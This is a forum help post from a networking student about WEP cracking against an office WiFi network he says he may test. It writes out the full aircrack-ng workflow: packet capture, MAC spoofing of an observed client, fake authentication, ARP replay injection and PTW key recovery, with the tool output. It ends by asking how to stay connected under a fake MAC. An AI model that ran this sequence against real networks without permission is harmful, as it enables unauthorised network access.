Aircrack returning wrong password ?

[Onikage]

[SOLVED: Check the bottom]
Hello all,
I'm a first year "Networking & Administration" student. My father has kindly allowed me to try and crack the encryption on the smaller non-significant kitchen WiFi network in his company office. I wasn't told what the password is but we bet that If I was able to crack it my pops would pay my next semester. I realize that similar introductions are not really relevant to the problem, but I just wanted to highlight the fact that I'm not doing anything illegal.

Straight to the problem. Since the network is WEP-encrypted, I'm running the most common pattern:

airodump-ng -c 9 --bssid 00:1c:f0:83:c4:f0 -w petrovi_wep -i wlan0

With this I was able to capture the MAC of someone in the office who was probably using the Net in his Lunch break - cc:55:ad:29:37:98

Then:

macchanger-m cc:55:ad:29:37:98 wlan0

Then:

bt ~ # aireplay-ng -e "Petrovi" -1 0 -a 00:1c:f0:83:c4:f0 -h cc:55:ad:29:37:98 wlan0
07:51:29 Waiting for beacon frame (BSSID: 00:1C:F0:83:C4:F0) on channel 9

07:51:29 Sending Authentication Request (Open System) [ACK]
07:51:29 Authentication successful
07:51:29 Sending Association Request [ACK]
07:51:30 Association denied (code 17)

07:51:33 Sending Authentication Request (Open System)

07:51:35 Sending Authentication Request (Open System) [ACK]
07:51:35 Authentication successful
07:51:35 Sending Association Request [ACK]
07:51:35 Association successful :-) (AID: 1)

Then:

CH 9 ][ Elapsed: 56 s ][ 2012-11-11 07:52

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:1C:F0:83:C4:F0 46 82 437 11 0 9 54. WEP WEP OPN Petrovi

BSSID STATION PWR Rate Lost Packets Probes

I intentionally highlighted the AUTH parameter since it returns OPN most of the times but every now and then it comes as SKA, which frankly puzzles me. Is it a SKA or an OPN. I don't know. This is not the airodump-screen from the actual cracking operation as you can see #Data is 0, I just pasted it so it can be seen that AUTH does return either an OPN or SKA result once "Association is successful".

Then:

aireplay-ng -3 -e "Petrovi" -b 00:1c:f0:83:c4:f0 -h cc:55:ad:29:37:98 wlan0

And that's about what I do. This way I'm able to capture between 250k and 1.5m IVs. Once I'm done sniffing:

bt ~ # aircrack-ng petrovi_wep-02.ivs
Opening petrovi_wep-02.ivs
Read 219491 packets.

# BSSID ESSID Encryption

1 00:1C:F0:83:C4:F0 Petrovi WEP (219490 IVs)

Choosing first network as target.

Opening petrovi_wep-02.ivs
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 219490 ivs.
KEY FOUND! [ 71:77:65:72:74 ] (ASCII: qwert )
Decrypted correctly: 100%

I also tried live cracking while maintaining airodump-ng with these parameters:

aircrack-ng -a 1 -0 -n 128 petrovi_wep-02.ivs

Result again was:

Opening petrovi_wep-02.ivs
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 219490 ivs.
KEY FOUND! [ 71:77:65:72:74 ] (ASCII: qwert )
Decrypted correctly: 100%

At this point you're probably thinking that there's no problem at all. Well let me tell you this. I've tried connecting with this password a gazillion times using all kinds of options:
- OPEN wep with 71:77:65:72:74, SKA wep 71:77:65:72:74 Hex
- OPEN wep with "qwert" with ASCII checked, SKA wep with "qwert" with ASCII checked
- OPEN wep with "qwert" with ASCII unchecked, SKA wep with "qwert" with ASCII unchecked
- OPEN wep with 71:77:65:72:74 with ASCII checked, SKA wep with 71:77:65:72:74 with ASCII checked

None of these worked. PWR is good between 40 and 70. However I can't connect using this password. The funny thing is that the first time when I tried this I captured the MAC of another client and also about 1.5 million IVs. Ran it through PTW - same password, again 100% decrypted correctly. I deleted the first .ivs flie because I thought it was bogus.

I tried decrypting with "-K" as well, however it ran for 10 straight hours after which I thought to myself that even if it returns a password successfully, waiting for 10 hours is not a viable option for a professional pentester, so the result is useless even if the pass is correct.

System:
OS: Backtrack 3 HDD installation (KDE)
Machine: DELL Latitude CPi D300XT
Adapter: ALFA awus036h

I already googled this and I found a couple of guys who claim their aircrack-ng also returns non-functional passwords. However all of them receive a working one in a following run and their problem is fixed. I decrypt the same password over and over again and I can't connect at all.
I tried connecting with:
- iwconfig
- some KDE GUI called K Wireless Lan Manager

I have no idea what am I doing wrong. Thanks in advance to all the people who decided to join in and help.

[SOLVED]:
Ok this was a rather stupid mistake from my side. Apparently the AP was somewhat slower to accept connections. I had to increase timeout to 30s and I was able to connect.

Question: I was able to connect and opened Google successfully. However AP kicks me 30-60s (sometimes longer) after I connect. I'm using a fake MAC but I still get kicked. Any idea how to resolve this ?